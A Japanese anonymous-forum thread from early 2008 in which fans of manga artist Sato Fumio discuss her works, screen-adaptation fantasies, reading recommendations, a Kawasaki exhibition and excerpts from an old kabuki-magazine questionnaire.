646 :花と名無しさん:2008/01/08(火) 17:05:46 ID:???0
馬鳴のマンションにあった「お掃除ロボ」、そっくりなものを最近どっかの雑誌で見た
廉価版で2万円代だった
マンガの通り、充電から自分でやるってヤツw

ほしいな

647 :花と名無しさん:2008/01/08(火) 19:22:04 ID:???0
このスレ331で出で時点でも超既出だよ〜
欲しいけどw

648 :花と名無しさん:2008/01/09(水) 13:22:26 ID:???0
300番台とゆーと最近のことのように思えるが、もう半年も前なんだな。
最近の雑誌に載ってたならまだ売れているんだろ。
よかったじゃん。

649 :花と名無しさん:2008/01/09(水) 13:29:19 ID:???0
まだというか、時代が追いついたみたいな感じが


自分は部屋片付けないと使えないorz

650 :花と名無しさん:2008/01/09(水) 20:24:36 ID:???0
あれは馬鳴オリジナルだったの?
読んだ当時はそう思っていた。
ワンゼロ読んだ人が開発したのなら、ちょっとしたパラドックスになるかなw

>>649
同じくorz

651 :花と名無しさん:2008/01/09(水) 23:49:45 ID:???0
馬鳴オリジナルというか、
なんか市販のキットみたいなものがあって組み立てて使う、
そんなカンジじゃなかった?
エミーがそんなようなことを言ってたような(うろ覚えでスマン)

652 :花と名無しさん:2008/01/10(木) 05:19:57 ID:???0
家電板の自走式掃除機スレ住人の私がきましたよ
種類は2万切るやつから高いのは8万超えで、売れてますよお客さん
一番人気のルンバはアメリカ製なんだよな〜大手国産が出たらヒットするだろうに

持ってないけどw

653 :花と名無しさん:2008/01/10(木) 07:03:40 ID:???0
ルンバかどうかは不明だけど、行きつけの鍼灸院で使ってるそうだ。
一人でやってるとこなので、フロアの掃除は結構大変だったらしく
「昼休みにご飯食べてる間に掃除してくれるんだ、便利だよー」とご満悦だった。
狭くて物が多いご家庭ではイマイチ実用性が低そうだけど
なるほどそういう所では、確かに便利そうだと思った。

654 :花と名無しさん:2008/01/10(木) 07:28:30 ID:???0
馬鳴のは低い10cmくらいの階段なら、もぞもぞ動けそうな主体性がありそうなイメージだけど
現世界では1、5cmのラグマットが超えるか超えないかで機能レベルが分かれていて
SFファンタジーとリアルの差がミリ単位で分かれる所が面白いつーか

しみじみ未来予測の正確さが解った、今の時点での新作描いてもらいたいなあ
あのころと同様、はは〜んてなもんかもしれんがw

655 :花と名無しさん:2008/01/10(木) 12:19:03 ID:???0
でも、音楽の録音・再生はカセットテープなんだよね

656 :花と名無しさん:2008/01/10(木) 13:05:03 ID:???0
DATが一般向けに商品化されたのが'87年で、ワン・ゼロ連載は86年まで。
DATはその後、一般に普及する一歩手前でMDに取って代わられた。
でもMDが出たのは92年だそうだよ。
この分野での予測は難しかったと思う。

やっぱりワン・ゼロはもっと評価されてもいいはずだよ!(結論が飛躍しすぎ)

657 :花と名無しさん:2008/01/10(木) 13:26:11 ID:???0
ディスクは出てるけど、CDなんかに自宅で記録出来るようになるのを予測するのは
難しかっただろうな



658 :花と名無しさん:2008/01/10(木) 18:55:16 ID:???0
>>656
確かに結論が飛躍しすぎだな

659 :花と名無しさん:2008/01/11(金) 14:37:56 ID:???0
佐藤史生作品がもっと評価されるべきだってことは
ここの住人、みんな思ってるよな。

恐竜好きのアメリカ人なら、夢見る惑星なんて
映画化したがりそうな気もしたのだが。
でも、映画化するならイギリス制作キボン。

660 :花と名無しさん:2008/01/11(金) 14:50:59 ID:???0
ここから配役論争が↓

661 :花と名無しさん:2008/01/11(金) 18:08:55 ID:???0
>660
じゃあ、楕円軌道ラプソディのあきもと雨衣子(だっけ?)のCVに能登麻美子

回想:閻魔あいしゃべりで。
本編:素しゃべりはっちゃけモードで。

662 :花と名無しさん:2008/01/11(金) 20:59:58 ID:???O
「夢見る惑星」実写版、イギリス映画なら見てみたいかも。
ジブリアニメとゲーム化は却下!!!

663 :花と名無しさん:2008/01/11(金) 21:42:07 ID:???0
地味なSF映画なんて儲からないから無理w

664 :花と名無しさん:2008/01/11(金) 22:25:12 ID:???0
普通に?アニメで見たいなあ。。超深夜枠でいいから

665 :花と名無しさん:2008/01/11(金) 22:35:54 ID:???0
アニメなら、、ライジアの声は塩沢さんにやってほしかった・・・
今でも惜しい

666 :花と名無しさん:2008/01/11(金) 22:50:29 ID:???0
アニメかぁ…天空のエスカフローネと天使のたまご(押井監督の)の中間ぐらいの
絵の感じなら見たい。

667 :花と名無しさん:2008/01/11(金) 23:37:03 ID:???0
>>665
あー、イメージが合ってるね

>>664
自分もそう思う
丁寧につくってうまい声優を使えば、そこそこイケ……ないか、やっぱりw

地味だもんなぁ。やっぱり『夢みる……』は漫画や小説がいいんじゃないかな

668 :花と名無しさん:2008/01/11(金) 23:37:30 ID:???0
>>659
評価はされてると思うけど

669 :花と名無しさん:2008/01/11(金) 23:39:10 ID:???0
667に補足
ノベライズしろという意味ではありません
媒体として、映画やアニメではなく、漫画や小説がいいのではないか、という意味

670 :花と名無しさん:2008/01/11(金) 23:50:34 ID:???0
昔、マキャフリーの「竜」シリーズを佐藤さんにマンガ化してほしいって、
画集かぱふだかに書いてあって、ああ、納得って思ったなあ。

でもマキャフリーの小説は「竜」シリーズ以外のものが好き

スレ違いごめん

671 :花と名無しさん:2008/01/12(土) 19:37:21 ID:???0
>>668
「もっと」もしくは「もう少し」という意味だと思う。
すべてとは言わないが殆どの作品が今も手に入るといいよね。
書店に作品が並んでいないと、知名度が下がっていくしかないもんなあ。
エロな少女漫画ばかりだもんね。

672 :花と名無しさん:2008/01/12(土) 20:12:07 ID:???0
すでに知ってる人は充分評価してるけど、新規開拓が少なくてもどかしいんだよな

そのためにも新作を…

673 :花と名無しさん:2008/01/12(土) 20:33:15 ID:???0
『夢見る惑星』って地味かな?
人類滅亡の危機ものだったら確実に「アルマゲドン」なんかより
派手で面白い映画になりそうかとも思ったけど。
ファンタジー映画も流行ってる今なんか、けっこう
いいタイミングなのかもかもしれないとは思う。
だが、あの作品は漫画という形式で完成されてるし
へんにいじられて、がっかりさせられるのはかなわん。

674 :花と名無しさん:2008/01/13(日) 00:07:28 ID:???0
ズオーに会いたい

675 :花と名無しさん:2008/01/13(日) 00:48:30 ID:???0
ズオーときいて宇宙戦艦ヤマトを思い出す世代…

676 :花と名無しさん:2008/01/13(日) 02:24:13 ID:???0
>>673
地味だと思うよ

そいうえば、小惑星(彗星)激突の話なら、
「アルマゲドン」より「ディープ・インパクト」のほうが深みがあっていいと自分は思う
でも、興行的には前者のほうが上のはず
なぜって後者は展開が地味だからサ

あと、最後の2行は同意できない
いじらなければ映像化は無理だし、また映像化する意味もないんじゃないかなぁ

677 :花と名無しさん:2008/01/13(日) 02:28:36 ID:???0
>>671
いまは漫画も出版点数がめちゃくちゃ多いから、
常時書店に置かれるのは難しいよね新作がほとんどなく、

でも、過去の単行本も決して売れ筋とは思えないのに文庫化されたのには正直驚いた
だから、十分に正当な評価を得ているよ
これ以上を望むのはかなり難しい、と思う。吾妻さんの起死回生のヒット作のようなものでもない限り



678 :花と名無しさん:2008/01/13(日) 02:30:30 ID:???0
>>674
シリンとカラに会いたいな。あと、ラカン

>>675
その世代だけど……誰だっけ? ドメル将軍なら知ってるぞ

679 :花と名無しさん:2008/01/13(日) 02:33:56 ID:???0
>>678
ヤマトの人はズオーダー大帝

680 :花と名無しさん:2008/01/14(月) 00:51:33 ID:???0
>>676
>いじらなければ映像化は無理だし、また映像化する意味もないんじゃないかなぁ

横レスだけど673は、「だから映像化する必要はない」って言いたいんじゃないかと。

681 :花と名無しさん:2008/01/15(火) 19:24:35 ID:???0
>>677
吾妻さんの起死回生のヒット作とは「失踪日記」のことですか?
読んでみようかな…

確かにヒット作が出たら、全集が出る夢は叶いそう。
ワンゼロをリニューアルはだめかなあ。
やっぱり新作だよねえ。

682 :花と名無しさん:2008/01/15(火) 19:53:29 ID:???0
>>681
「失踪日記」はすごいよ。いろんな点ですごい。
絵が崩れてないのもすごいけど、あれだけの内容が、まるでフィクションみたいに
淡々と冷静にネタとして描かれてるあたり、読んで損はないと思う。

ワンゼロは、当時すでに旧作(夢喰い)のリニューアルだったから、
それをもう一度はないんじゃないかなあ。
やっぱり新作読みたいよね。

683 :花と名無しさん:2008/01/16(水) 00:42:51 ID:???0
正月に久しぶりにワンゼロ読み返した。結末を気にしてあせって読んでた昔は気付かなかったけど、じっくり読むと知的な会話がとても面白い。

でもやはりよく分からないのがインドリア側の正体。ダーサが人間のカルマから生まれたというのはいいんだけど、インドリアはどこから? 
宇宙が巨大な計算機というのがシリアスな設定で、その「見張り+天敵プログラム」がインドリアということでいいのかな。あまりに途方もない説なので漫画の中でも「一つの解釈」ぐらいの扱いだと思ってたんだけど。

684 :花と名無しさん:2008/01/16(水) 02:41:34 ID:???0
やっぱりこう…炉の外で変な渦が発生したら潰すために見張ってるんじゃ
惑星開発したり…

685 :花と名無しさん:2008/01/16(水) 12:13:01 ID:???0
シですかw

686 :花と名無しさん:2008/01/16(水) 20:06:29 ID:???0
>>683
インドリアも人間の「何か」から生まれるもんだと思ってた
どちらも人なくして存在しないもので、
善と悪は表裏一体、結局は同じもんかな、と

687 :花と名無しさん:2008/01/16(水) 20:33:07 ID:???0
秩序が乱れれば、それを元に戻そうとする力も自然に働くからね
善悪とは無関係にあらゆる世界はそういうものだ、と

688 :花と名無しさん:2008/01/16(水) 20:58:56 ID:???0
善悪って観念じたい、人なくして存在しないものだからね

689 :花と名無しさん:2008/01/17(木) 08:35:22 ID:???0
普通はそうだけど、ワンゼロの世界ではインドリアが正義や秩序を定め、
布教という形で人間界に広げようとした感じじゃない?
人々から生じたローカルな神であるルシャナがその邪魔をしていた。
あとマユリは「端末」と呼ばれていたから、「世界は計算機」というのも
シリアスな設定だったのかも。


690 :花と名無しさん:2008/01/17(木) 11:36:01 ID:???0
>普通はそうだけど、ワンゼロの世界ではインドリアが正義や秩序を定め、
>布教という形で人間界に広げようとした感じじゃない?

それらもアートマン側の理屈による善悪であって、
絶対的なものじゃないよ

691 :花と名無しさん:2008/01/17(木) 18:50:09 ID:???0
マユラとトキオみたいな会話だな

692 :花と名無しさん:2008/01/17(木) 23:22:51 ID:???0
頭が固いな。

693 :花と名無しさん:2008/01/18(金) 18:44:30 ID:???0
誰の?

694 :花と名無しさん:2008/01/19(土) 21:04:01 ID:???0
私の。

695 :花と名無しさん:2008/01/19(土) 22:42:10 ID:???0
そう、あんたの。

696 :花と名無しさん:2008/01/19(土) 23:23:45 ID:???0
七生子と類のやりとりかw

697 :花と名無しさん:2008/01/24(木) 01:45:20 ID:???0
人いないなあ・・・(´・ω:;.:...

なんでもいいから少女漫画貸してと
20代男子(手塚治虫好き)に言われて
佐藤さんを貸そうと思ってるんだが
つかみは「ワンゼロ」がいいかな?


698 :花と名無しさん:2008/01/24(木) 02:12:53 ID:???0
もしその人が少女漫画らしいものを期待してるなら佐藤さんはあまり向いてないようなw

ワンゼロは発表当時の時代背景とかの概念がない若い子にはしんどいような。
佐藤作品はコンピューターを扱ってる割には陳腐化は少ないほうだけど、いきなりだとつらそう。
最初は近作の「魔術師さがし」とか、
長編なら時代関係ない「夢みる惑星」とかのほうが良くないかな

699 :花と名無しさん:2008/01/24(木) 03:29:36 ID:???0
ここは七生子シリーズを…

700 :花と名無しさん:2008/01/24(木) 10:49:27 ID:???0
その子が少女漫画にどーゆーイメージもってるかによるけどなぁ
つかみなら、
一冊でまとまったシリーズものか、あるいはSF短編集がいいんじゃないか

701 :花と名無しさん:2008/01/24(木) 11:47:07 ID:???0
佐藤さんの短編でSFじゃないのもあるの?

702 :花と名無しさん:2008/01/24(木) 12:23:08 ID:???0
>>701
あるよ。ふりかえるケンタウロスとか、まさかのときのハーレクインロマンスとか
倭さんの出てくる話とか。
単に今思いついたのを並べただけだけど。

703 :花と名無しさん:2008/01/24(木) 14:43:19 ID:???0
>>702
それら手に入らないから私に貸してほしい…

「天界の城」が入ってる文庫はどうだろう。
あのセクロス描写がセクシーで、(こう言ったら何だが)面白かったので。

704 :花と名無しさん:2008/01/24(木) 15:14:40 ID:???0
天界の城 でググりたまえ
http://www.amazon.co.jp/dp/4150306648

705 :花と名無しさん:2008/01/25(金) 22:11:14 ID:???0
>697
やっぱ『夢見る惑星』から行こうよ
少女まんがにもこんなすごいのあるんだって
見せたるんだ!

706 :花と名無しさん:2008/01/25(金) 22:43:06 ID:???0
少年漫画とか少女漫画とかいうカテゴライズも、
今となっては妙なもんだけどな

707 :花と名無しさん:2008/01/26(土) 00:03:37 ID:???0
でも少女漫画(というか基本的に女向けの漫画)でないと出ない味もある

708 :花と名無しさん:2008/01/26(土) 10:13:45 ID:???0
>>706
女の子から見たらそうだろうけど男の子側はそうは思ってないと思う
女子は抵抗なく少年マンガ読むけど、逆は色々覚悟がいるみたいだし
少女漫画全体で見るとやっぱ恋愛情緒中心のものが多いしね。

709 :697:2008/01/26(土) 23:03:31 ID:???0
皆々様レスありがd。
「少女漫画」については女性をメインターゲットにしている漫画で捉えてもらって
似たり寄ったりの恋愛モノを除いて面白いものをということで。
私が貸す子の場合は>>708がビンゴだと思う。
なんせ少女漫画にSFあるんですか!?ってびっくりされてこっちがびっくりした。

自分の一番は「夢みる惑星」なんだけど
「ワンゼロ」の方がコンピュータが前面に出てるせいか
よりクールな感じで、スピード感もあって男性は入りやすいかなと。
でも>>698>>700の指摘にあるようなことを考え始めたら
何がいいのかわからなくなってしまってorz
そんな時にここを思い出して、皆のオススメを聞かせてもらって
一番オススメが多かったものを貸したらいいんじゃないかと考えた次第です。
来週末頃に貸すと思いますんで、皆様どうかお力をー(^∧^)

710 :花と名無しさん:2008/01/27(日) 00:23:13 ID:???0
ファンタジー馴れしてるなら
物語的な面白さとわかりやすさで言えば
夢見る惑星かなあと思うけど
ワンゼロは舞台背景やモチーフは馴染みがあるけど
話的にはわかりづらい気がする


711 :花と名無しさん:2008/01/27(日) 05:25:39 ID:???0
インドやニューエイジ系の読み物に嵌ってた男子にはワン・ゼロはうけた。
トキに共感し易かったらしい。

逆に夢見る‥はイリスの出生の秘密?辺りでリタイアされてしまったorz

712 :花と名無しさん:2008/01/27(日) 20:46:33 ID:???0
手塚が好きなら、
「鬼追うもの」「羅陵王」「心臓のない巨人」あたりもよさそうかな

713 :花と名無しさん:2008/01/27(日) 21:43:40 ID:???0
とりあえず、題名だけ挙げて「一番読んでみたいもの」を選んでもらうってのはどう?

714 :花と名無しさん:2008/01/30(水) 19:51:03 ID:???0
カバーと最初の1頁めの画像を送ってみれば?
ケータイで十分でしょ

715 :697:2008/02/02(土) 02:27:15 ID:???0
皆さんどうもありがとう。
結局、今貸してる本がまだ読み終わってないからと
貸すのは来週になりますた。
で、「夢みる惑星」が一番名前が挙がってるのでこれでいきます!
その後はタイトル挙げて選んでもらうことにしますw

>>714
いいアイデアなんだけど、選んでもらうのに1冊じゃすまないし
2、3冊は結構手間かかるなーと思ってしまう人間なんでゴメン。

716 :花と名無しさん:2008/02/06(水) 10:55:12 ID:lBNi5fJg0
ホシュ

717 :花と名無しさん:2008/02/08(金) 11:17:57 ID:???0
長らく中断していた十二国記は
続き物が雑誌に掲載されるとかでファンが盛り上がっててウラヤマシイ

佐藤さんも何か新作出さないかなぁ
漫画ではなく、読書絵日記の連載とかもいいなー



718 :花と名無しさん:2008/02/11(月) 10:50:24 ID:???0
去年の暮れ、思い余って先生の出身地、宮城県登米市の書店、古書店を
ハシゴして来ました。けれど、収穫ゼロでした(そりゃそうだ)。

それにしても、
「十二国記」と「星界シリーズ」と鶴謙さんと史生先生。
どうしてみんな、こんなに仕事してくれないのかな!っと…orz

719 :花と名無しさん:2008/02/11(月) 13:37:27 ID:???0
ツルケンは細々と仕事してるけどね
今でもマンガ描いてるし

ただ放りっぱなしのが多すぎるねw
佐藤さんは一応すべての作品でオチはつけてる

720 :花と名無しさん:2008/02/11(月) 19:58:17 ID:???0
というか、もともと長編向きの作家じゃないんだろうな

と思う

721 :花と名無しさん:2008/02/11(月) 23:37:19 ID:???0
おじゃましますー
ちょっと質問させてくださいな(^^

最近何年かぶりに文庫版の「天界の城」を読んで
表題作に今更のようにハマってしまいました(^^;

何度も読み返してるうちにカラーの絵が見たくなったのですが
(髪の毛の色とか何色だったんだろう・・・と思うようになりましてw)
雑誌(SFマガジン)に掲載時や他の単行本に収録した時に
カラー絵はあったんでしょうか??

722 :花と名無しさん:2008/02/17(日) 10:19:22 ID:???0
パングロスって元ネタあったんだね…知らなかった

http://ja.wikipedia.org/wiki/カンディード

723 :花と名無しさん:2008/02/18(月) 20:06:40 ID:???0
物語の展開なりテーマなりの元ネタかと思ったら、ただの名前か?

724 :花と名無しさん:2008/02/21(木) 19:28:45 ID:???0
名前ってとても重要だよ

725 :花と名無しさん:2008/02/21(木) 22:51:22 ID:???0
そりゃそうだが、元ネタとはまた大袈裟な


726 :花と名無しさん:2008/02/23(土) 11:15:54 ID:???0
wikipedia読んだけど、作品の世界観とかなり通じるところがある感じ。元ネタと
まではいかなくても刺激を受けたのは確かかと。やっぱ広い教養がバックにあるんだなあ。

727 :花と名無しさん:2008/02/26(火) 14:56:57 ID:???0
広い教養っつーか、
昨今じゃ、一歩間違えると簡単にパクリと呼ばれちまうw

っつーか、もともと722はそーゆー否定来てな意味で書き込んでるように見える
自分の思い過ごしかもしれないが

728 :花と名無しさん:2008/02/27(水) 00:51:07 ID:???0
あ、それは誤解です
パングロスという名前の引用先くらいの意味だったのですが
元ネタという言葉が悪かったみたいですね。
適当に名前考えてるんじゃなくて、知ってる人には通じる
(知らなくても別に問題ない)ような名前の付け方してるんだなあと。

自分は知らなかったのでハケーンしてつい嬉しくて…な。


729 :花と名無しさん:2008/02/27(水) 16:33:10 ID:???0
>>726
世界観……が通じてるかなぁ? でもまあ、自分に想像力が足りないだけかしれん

>>728
そうなんだ。722を読んだときは否定的な意味かと思った。失礼しました


730 :花と名無しさん:2008/02/27(水) 16:34:05 ID:???0
>>729
想像力じゃなくて、読解力か。自己レス失礼

731 :花と名無しさん:2008/02/28(木) 22:49:23 ID:???0
>>500くらいで話題になってた川崎での展示会に行った人いる?
ぶっちゃけ、行く価値があるのか知りたい

明日の16:00から公開座談会なるものがあるみたいだが、
平日の夕方に開催する意味があるのかと問い詰めたい

732 :花と名無しさん:2008/02/28(木) 22:58:29 ID:???0
会場内がどんな感じかは
ttp://www.kawasaki-museum.jp/magazine/blog/report/
にある動画で確認できた。連投スマソ

733 :花と名無しさん:2008/02/29(金) 11:10:43 ID:???0
>>731
参加して問いつめればいいじゃん。ここで言われてもなぁw
見るべき価値があるかどうか、判断するのは人それぞれだし

とりあえず、自分が知ってる範囲では萩尾スレの226にレポートがあったが


734 :花と名無しさん:2008/02/29(金) 14:43:05 ID:???0
>>733
少女漫画板では吉野家コピペが通じないのかw

735 :花と名無しさん:2008/02/29(金) 18:43:55 ID:???0
「小一時間問いつめたい」といった2chの常套句は知ってるけど、
それと同じようなものか?
なんにしても、別にいーじゃんか。
733の書いてることは至極もっともな意見だし、レポート先も紹介してて親切じゃん。

736 :花と名無しさん:2008/02/29(金) 21:07:53 ID:???0
>>732
いろいろイベントがあるから佐藤センセも来るのかな。
自意識過剰なところのなさそうな方だから、ふらっと紛れ込んでいそう。

737 :花と名無しさん:2008/03/01(土) 11:41:21 ID:???0
> 733の書いてることは至極もっともな意見
レポートはともかく、つまらんことに噛みつく人だなぁって印象しか持たなかったが。

738 :花と名無しさん:2008/03/01(土) 13:07:30 ID:???0
吉野家コピペが中途半端だからネタなのかマジなのかわかりづらいけど
言いたいことは平日の夕方じゃない方が参加しやすいのにってことなんでしょ?

私も休日の午後とかの方が人集まるんじゃないかなって思うけど
パネラーの人の都合とかなのかな

739 :花と名無しさん:2008/03/01(土) 13:28:26 ID:???0
>>736
分かる
本人全く知らないんだが自分の脳内ではシリンのイメージだw

740 :花と名無しさん:2008/03/02(日) 12:21:50 ID:???0
>>739
私は七生子イメージなんだが、シリンもわかるw
どっちもおかっぱだな

741 :花と名無しさん:2008/03/02(日) 14:28:04 ID:???0
でも、佐藤史生をモデルにしたキャラが、キャベツ畑のポージィだぞ。

742 :花と名無しさん:2008/03/02(日) 14:30:33 ID:???0
案外あのタイプ(知らんがw)が化けるのだw

743 :花と名無しさん:2008/03/03(月) 15:31:50 ID:???0
>>737
君もかな

744 :花と名無しさん:2008/03/03(月) 16:58:24 ID:???0
清原なつのさんも本格復帰されているようなので
佐藤さんにもそろそろマンガを描いていただきたい
原稿依頼しようって編集さんはいないのかな・・・

745 :花と名無しさん:2008/03/04(火) 16:45:26 ID:???0
自画像なら
ttp://flowers.shogakukan.co.jp/interviwe/interviwe_05.html
に載ってるぞ。ほとんど参考にならんと思うが

>>744
最新作の「魔術師さがし」を含むほとんどの作品が絶版だしな〜
扱うとしたらflowers位しかないよね。根気よく要望出すしかないんでは?

746 :花と名無しさん:2008/03/06(木) 20:21:03 ID:???0
そもそも、本人に創作意欲がないのかもしれんな

747 :花と名無しさん:2008/03/06(木) 21:14:47 ID:???0
人生いろいろあるからなあ

748 :花と名無しさん:2008/03/07(金) 10:41:56 ID:???0
佐藤さんの創作意欲が消失してるとしたら
……悲しい。

749 :花と名無しさん:2008/03/07(金) 18:57:08 ID:???0
まあ、描き続けることがいいってわけじゃないし
ファンとしてはちょっと寂しいけどね

750 :花と名無しさん:2008/03/07(金) 19:28:07 ID:???0
レアな才能に魅了された我々への責任はどうなるんだ!w

751 :花と名無しさん:2008/03/08(土) 00:05:33 ID:???0
出せるものは全部出しちゃったのかもしれないな

752 :花と名無しさん:2008/03/09(日) 01:09:31 ID:???0
こういう風にネットなんかが現実化しちゃうとなかなかロマンの
仮託場所が見つけにくいかも

753 :花と名無しさん:2008/03/09(日) 17:11:12 ID:???0
豊穣なる混乱が現実化してしまったと

754 :花と名無しさん:2008/03/09(日) 23:55:00 ID:???0
佐藤さんの想像力はずっとはるか上を行ってると思うけどな。
思いついたのを軽い気持ちで出してほしい。
高いクオリティを課しすぎなのではないか。

755 :花と名無しさん:2008/03/10(月) 12:31:50 ID:???0
> 佐藤さんの想像力はずっとはるか上を行ってると思うけどな。
ハードルあげないで、あげないでハードル

756 :花と名無しさん:2008/03/10(月) 17:08:21 ID:???0
あ、ほんとだwスマソw
期待しちゃいかんのか…うーんジレンマw

757 :花と名無しさん:2008/03/10(月) 18:43:50 ID:???0
>>753
確かに!
何でもありでありながら、この閉塞感は・・・
時代を見越していたのかなぁ?

758 :花と名無しさん:2008/03/11(火) 11:27:51 ID:???0
佐藤さんに限らんけどね

759 :花と名無しさん:2008/03/11(火) 19:11:01 ID:???0
時代を見越していた人の一人ということだね

760 :花と名無しさん:2008/03/12(水) 00:15:37 ID:5BYsu++O0
捕手

761 :花と名無しさん:2008/03/13(木) 19:23:30 ID:MZ6xZn4g0
川崎行ってきたよ。
夢みる惑星の作品紹介の文章で、『主人公のシリンは云々』って書かれててがっかり…。
でも閲覧ブースで、ずっと読みたかった竜の夢その他の夢が読めたから嬉しい〜。持ってないんだよー。

762 :花と名無しさん:2008/03/13(木) 20:02:16 ID:???0
http://rainbow2.sakuratan.com/img/rainbow2nd31677.jpg

763 :花と名無しさん:2008/03/13(木) 23:14:10 ID:???0
>>761
そうなの!?!
行きたいよー!持ってないんだよ!遠すぎて行けないよ!
いいなorz

>>762
404 Not Found だった。

764 :花と名無しさん:2008/03/14(金) 00:40:20 ID:???0
川崎の展示、他にも巡回するんだよね
関西方面は京都のマンガミュージアムに来るんだったか

765 :花と名無しさん:2008/03/18(火) 23:07:35 ID:AGzBc40F0
自分も川崎行ってきた!
売っているカタログにインタビューが載っている
地にのめり込みそうなほど落ち込んだよ
どうしたら、創作意欲というものを湧かせる事が出来るんだ?

766 :花と名無しさん:2008/03/18(火) 23:26:17 ID:???0
で? インタブーの内容は?

767 :花と名無しさん:2008/03/19(水) 01:36:56 ID:???0
川崎のイベント、30日までだっけ?
気になるから行こうかな。

768 :花と名無しさん:2008/03/19(水) 04:52:24 ID:???0
>>765
もしや、もう描かない宣言とかですか?>インタビュー

769 :765:2008/03/19(水) 22:07:14 ID:w+e7lxxP0
>768
あ!いや、もう描かないではなくて、
「どう考えても私は描くより読む方が得手。〜中略〜
 創作意欲が人様の5分の1位しかない・・・」
という部分を読んで(涙)です


770 :花と名無しさん:2008/03/19(水) 23:20:17 ID:???0
「人様」が普通の漫画家をさしてるんなら
多めに見ても5年に1作くらいは・・・

                   
描いてくれよぉ〜

771 :花と名無しさん:2008/03/19(水) 23:36:36 ID:???0
すこぶる佐藤史生らしいとも思うよ。残念だけど。

772 :花と名無しさん:2008/03/20(木) 00:49:08 ID:???0
そんなんで諦められるものか。
佐藤さん、何か描いてくれなきゃこのスレ荒らしちゃうよ!

773 :花と名無しさん:2008/03/20(木) 05:11:39 ID:???0
そんなの痛くも痒くもないだろ
阿呆だなwwww

774 :花と名無しさん:2008/03/20(木) 10:04:43 ID:???0
このスレは荒らさないでください(;-:)

775 :花と名無しさん:2008/03/20(木) 10:24:16 ID:???0
まー、本人が描く気ないならしょうがないでしょ

776 :花と名無しさん:2008/03/20(木) 10:39:06 ID:???0
ここで、他の人というのが誰を指すかが問題だな。
萩尾望都とか、山岸涼子とかと比較するのならば少しは期待できそうだが。

777 :花と名無しさん:2008/03/20(木) 16:56:28 ID:???0
お二方とも連載もってますが

778 :花と名無しさん:2008/03/20(木) 17:08:01 ID:???0

創作意欲ありまくりの二人の1/5なら、それほど少なくはないから期待できそうってことでしょ?

779 :花と名無しさん:2008/03/20(木) 20:34:22 ID:???0
創作意欲が沸く可能性は確かにあると解釈することにした。

780 :花と名無しさん:2008/03/20(木) 20:36:38 ID:???0
沸いちゃいかんな、湧いてもらわんと

781 :花と名無しさん:2008/03/20(木) 20:59:20 ID:???0
沸くのは困るな。蒸発してなくなっちゃうよw

782 :花と名無しさん:2008/03/21(金) 01:06:24 ID:???0
>>778
「ありまくり」ってほどでもないでしょ

783 :花と名無しさん:2008/03/21(金) 01:09:22 ID:???0
本人にその気がないなら漫画は描かなくてもいい。
でも、なんか活動してほしいなぁ。
エッセイ+イラストとか。
月刊誌に1頁くらいなら何とかなりそうな気がする。


784 :花と名無しさん:2008/03/25(火) 22:01:28 ID:???0
「歌舞伎ワンダーランド 江戸の闇へのいざない」(S61発行)という雑誌で
思いがけず佐藤史生さんのアンケート記事を発見。

「歌舞伎についての10の質問」というタイトルで、
橋本治や木原敏江、美内すずえなどのお歴々とともにラインアップされているのですが、
佐藤さんのお答えは、この内容を、よく、そのまま雑誌に載せたなぁと驚くほどの率直さで…凄い…



785 :花と名無しさん:2008/03/25(火) 23:21:40 ID:???0
うp

786 :花と名無しさん:2008/03/26(水) 00:20:46 ID:???0
>この内容を、よく、そのまま雑誌に載せたなぁと驚くほどの率直さで…凄い…

好奇心刺激されまくりなんですが、生殺しなんてこたあないですよね・・

787 :花と名無しさん:2008/03/26(水) 13:50:52 ID:???0
佐藤さんに関する書籍は幸いにもコンプリートできたけど、こういうものまではさすがに
手が出ない…というかチェックしようがないわ〜orz

788 :花と名無しさん:2008/03/26(水) 19:06:01 ID:???0
>>784
うp

789 :786:2008/03/26(水) 19:25:37 ID:???0
著作権との絡みでどの程度まで引用できるのか、ご指導いただければ…

>>786
そこまで期待されるとガッカリされると思います


790 :花と名無しさん:2008/03/27(木) 00:47:49 ID:???0
テキストにしてそれをアプロダにうp、かなあ。
以前それをやってくれた人がいて嬉しかった。

791 :花と名無しさん:2008/03/27(木) 10:21:38 ID:???0
>>789
厳密なこと言えば、無断でそのままUPは問題でしょう
その「すごかった回答」をいくつか要約して書けば?

しかし、なんで歌舞伎雑誌で少女漫画家にインタビューしてんだろう?
それとも、男性作家も回答してんのかな?


792 :花と名無しさん:2008/03/27(木) 10:22:36 ID:???0
あ、橋本治さんもいた。ごめん、下の2行はなかったことに

793 :花と名無しさん:2008/03/27(木) 10:48:46 ID:???0
あの年代の少女漫画化って歌舞伎とか能なんかを題材にすることが
多かった気がするけどそういう時代のふいんきかな?

グレープフルーツとかも坂東某のインタビュー載せてたよね
幅広く文化に興味持とうみたいな啓蒙的な感じだった。

794 :花と名無しさん:2008/03/27(木) 18:33:51 ID:???0
そうだっけ?

木原さんが鬼が登場する漫画で描いてたかなー、
程度の記憶しかない
読んでた雑誌によって印象が違うんだろうけど

そもそも佐藤さんは能や歌舞伎に興味あったんかな?

795 :花と名無しさん:2008/03/28(金) 04:41:42 ID:???0
春を夢見しなんてのは
能テイストあったよ

796 :花と名無しさん:2008/03/28(金) 08:35:36 ID:???0
>>793
自分が思いつくのは森川久美さんとか、かい(変換できないw)悠紀子さんとかかな。

>>795
七生子シリーズでも黒塚にふれてるくだりがあったよね。

797 :花と名無しさん:2008/03/28(金) 09:22:43 ID:???0
>>795-796
ありがとう

でも、どっちも読んだことないみたい
佐藤さんはSF・ファンタジー系ばっかりだなー、自分が持ってる本


798 :花と名無しさん:2008/03/28(金) 09:43:52 ID:???0
絶版になった七生子シリーズに短編の新作を加えて出版してくれないかな。
あと、竜の夢にエッセイ加えて出版しt(ry

799 :花と名無しさん:2008/03/28(金) 16:26:22 ID:???0
「ライジングNo.4 歌舞伎ワンダーランド」(新書館) S.61発行 ムック本?

木原敏江 (漫画家)

一、歌舞伎をはじめて見たきっかけはなんですか?
友人の大学の図書館で「妹背山婦庭訓」の昔の文体で書かれた本を貸してもらって(中略)
たしかお三輪が玉三郎で(ry

二、いちばん興味をひかれた演目は何ですか?
やっぱり「桜姫」。

五、年に何回くらいご覧になりますか?
五〜六回。

九、こんな話や、事件、史実から歌舞伎になる!と思われるものを教えてください。
南朝秘史。

800 :花と名無しさん:2008/03/28(金) 16:27:13 ID:???0
美内すずえ (漫画家)

一、歌舞伎をはじめて見たきっかけはなんですか?
十代の終わり頃、私の住んでいた町内に観劇の切符がまわってきて(ry

二、いちばん興味をひかれた演目は何ですか?
友人の漫画家の今井かおるさんが猿之助ファンで彼女につれられて
